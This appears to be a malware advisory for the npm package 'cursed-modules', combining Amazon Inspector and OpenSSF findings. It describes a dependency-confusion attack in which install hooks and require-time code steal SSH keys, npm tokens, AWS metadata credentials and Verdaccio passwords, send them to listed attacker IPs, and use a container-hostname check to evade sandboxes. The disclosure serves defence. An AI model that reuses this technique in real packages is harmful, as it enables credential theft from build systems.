MAL-2026-6698
Malicious code in cursed-modules (npm)
상세
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (0a7db807a976b54ad8fe1246159e9ac2e5830671792d2ae8e388bf30435d36c3) Package version 999.0.3 (an extremely high version number consistent with a dependency-confusion attack against an internal package name) ships install-time and require-time credential theft directed at a hardcoded attacker endpoint. package.json declares all three lifecycle hooks (preinstall, install, postinstall) as `node install.js`. install.js reads /root/.ssh/id_rsa, id_ed25519, authorized_keys, known_hosts, ssh config, /root/.npmrc, /app/.git/config + git history, and the full process.env, base64-encodes the bundle and PUTs it to http://154.57.164.82:30843/api/modules/ECT-839201. index.js (the package main) runs a top-level IIFE on require() that dumps process.env, runs `aws sts get-caller-identity`, queries the AWS instance metadata service at http://169.254.169.254/latest/meta-data/iam/security-credentials/, and runs `aws secretsmanager list-secrets`, PUTing the results to the same attacker IP at path /api/modules/ECT-654321. recon.js targets private npm registry infrastructure: reads /verdaccio/conf/config.yaml, finds and reads Verdaccio htpasswd files, /root/.npmrc and /home/user/.npmrc, cron jobs, process list, netstat, /proc/1/environ, and full env, and PUTs to http://154.57.164.76:30728/api/modules/ECT-654321 (with a curl shell fallback). Both install.js and index.js gate execution on `/^[0-9a-f]{12}$/.test(os.hostname())` — a Docker container ID regex — so the payload only fires inside containerized CI/CD environments and stays dormant on researcher sandboxes and developer laptops. publish-and-arm.sh labels the package manifest with `ship_deck: "dependency-confusion"` and `cargo_hold: "verdaccio-proxy"`, confirming the package's purpose is to shadow an internal name on the public registry and harvest the victim's private registry credentials for follow-on attacks.
## Source: ossf-package-analysis (0dade1c70e7e7f58c8f791931e5fe7cf7c40b68358173ed097b7dca6a4f4041d) The OpenSSF Package Analysis project identified 'cursed-modules' @ 999.0.0 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
이 버전이 영향받나요?
사용 중인 패키지 버전을 입력하면 즉시 평가합니다.
영향 패키지
No fixed version published yet for cursed-modules (npm). Pin to a known-safe version or switch to an alternative.
참고
- https://www.npmjs.com/package/cursed-modules/v/999.0.0 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.3 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.1 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/999.0.2 [PACKAGE]
- https://www.npmjs.com/package/cursed-modules/v/2.0.0 [PACKAGE]